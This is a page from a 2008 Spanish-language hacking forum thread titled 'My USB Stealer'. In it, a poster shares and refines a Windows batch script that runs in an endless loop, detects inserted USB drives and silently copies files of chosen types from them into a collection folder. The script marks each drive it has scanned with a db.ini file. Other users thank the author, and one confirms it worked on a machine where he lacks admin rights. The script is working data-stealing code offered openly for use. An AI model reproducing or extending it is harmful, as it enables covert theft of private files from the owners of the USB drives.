elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  My USB Stealer
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: My USB Stealer  (Leído 16,138 veces)
SmartGenius

Desconectado Desconectado

Mensajes: 181


:P


Ver Perfil WWW
Re: My USB Stealer
« Respuesta #20 en: 22 Noviembre 2008, 23:57 pm »

Hay una cosa que se os esta lvidadno y es que el code siempre va a estar en ejecucion y copiando cosas de las unidades a menos que pongan algo que le diga que ya debe dejar de hacerlo....

Por ejemplo...el hace el Escaneo de las unidades C....Z y empieza a copiar, luego por ejemplo tenemos una USB en la unidad H, el pasa y al encontrarla hace lo debido de copiar los datos, despues sigue con las demas unidades pero como ya no hay mas pues vuelve a empezar el ciclo y vuelve a recopiar todo lo de la unidad H y asi sucesivamente, por eso es que no se las deja expulsar porque sigue siendo usada......en eso ya habia pensado y es por eso que agregue algo de comprobacion en la siguiente parte...

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB >%letra%:\db.ini
goto :eof


asi cuando vaya a esa unidad simplemente la ignora porque ya fue analizada y se libra dle problema de que esta siendo usada, aunque en alguna proxima ocasion podria ser cambiado el contenido de dicha unidad y el programa no podria funcionar por lo que habria que hacer ya un chekeo por fecha de la creacion del archivo de comprobacion, pero no debe ser muy dificil...

aparte otra cosas en la que deben mejorar el codigo es en la comprobacion de las unidades USB...

Miren el codigo de la V2...

Código
  1. @echo off
  2. title USB Stealer
  3. REM Motor de Escaneo de USBs
  4. REM Coded by :: SmartGenius ::
  5.  
  6. :ini
  7. for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder="%%a"
  8. for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
  9. if exist "scan.exit" exit
  10. goto main
  11.  
  12. :main
  13. for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
  14. if not exist "%%n:\RECYCLER" call :usb %%n)
  15. goto ini
  16.  
  17. :usb
  18. set letra=%1
  19. if exist "%letra%:\db.ini" goto :eof
  20. for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
  21. echo USB>"%letra%:\db.ini"
  22. goto :eof
  23.  
  24.  

Cualquier duda pueden postearla que con gusto les ayudare..

Saludos.


En línea


corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: My USB Stealer
« Respuesta #21 en: 23 Noviembre 2008, 16:57 pm »

Excelente, SmartGenius, creo que eso era lo que faltaba.

Muchas gracias.


Nos vemos  ;)


En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
estudcom

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: My USB Stealer
« Respuesta #22 en: 27 Noviembre 2008, 14:51 pm »

 joe muchisimas gracias de verdad ya he conseguido todo lo que queria y gracias a vosotros. Solo tengo una preguntilla mas (la ultima de verdad). He probado en un ordenador en el que no tengo privilegios de administrador el programa y he metido mi pen drive. Ha copiado perfectamente todo a una carpeta en c como queria. como ya he visto que funciona he borrado el programa completamente del ordenador. El problema es que ahora quiero borrar los archivos de mi pen drive que se copiaron al ordenador y me salta la ventana de error, de que se estan usando o algo así. He reiniciado el ordenador y he vuelto a iniciar sesion y sigo sin poder borrarlos. Conoceis alguna forma efectiva de borrar carpetas y archivos? He utilizado estos tres programas y me dicen que no pueden borrarlos.
Unlocker
File assesin
Killerbox

Puede ser que ya no pueda borrarlos nunca a no ser que se formatee el ordenador?. Os digo que no tengo privilegios de administrador y por si eso influyera he pasado la carpeta de c donde se copio todo a mis documentos porque en mis documentos si puedo borrar cosas que copie de mi pen, pero tampoco me deja. Lo que quiero decir es que en el ordenador puedo borrar archivos perfectamente (escepto lo de archivos de programa) con lo que no entiendo porque no me deja borrar estos. Muchas gracias por todo aunque no puedan ayudarme
En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: My USB Stealer
« Respuesta #23 en: 27 Noviembre 2008, 20:31 pm »

hola estudcom,

en principio esos archivos deberían poder borrarse de manera perfectamente normal, y más utilizando herramientas como el KillBox o el Unlocker... si a pesar de usarlas no has podido borrar los archivos, inténtalo con el Clean Disk Security.
Puedes encontrarlo aquí:

http://www.theabsolute.net/sware/clndisk.html


Una vez instalado presiona con el botón derecho del ratón sobre la carpeta de archivos que quieras borrar y selecciona "erase fully".

Es un truco que me ha funcionado a veces cuando los archivos se ponen rebeldes y no consigo que funcione el Unlocker.

Si no te funciona háznoslo saber y encontraremos una solución.

Hasta pronto!

En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas implementando un stealer...
Análisis y Diseño de Malware
Debci 9 5,086 Último mensaje 9 Abril 2013, 11:10 am
por Debci
[Delphi] DH ScreenShoter Stealer 0.2
Programación General
BigBear 0 1,824 Último mensaje 25 Noviembre 2013, 15:34 pm
por BigBear
[Delphi] DH WebCam Stealer 0.2
Programación General
BigBear 1 2,163 Último mensaje 29 Noviembre 2013, 15:39 pm
por daryo
Ayuda Código CMD- USB Stealer
Scripting
shhadow9 5 3,362 Último mensaje 28 Junio 2014, 07:32 am
por Eleкtro
stealer web y crypter
Scripting
arthusu 0 1,275 Último mensaje 22 Junio 2018, 04:37 am
por arthusu
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines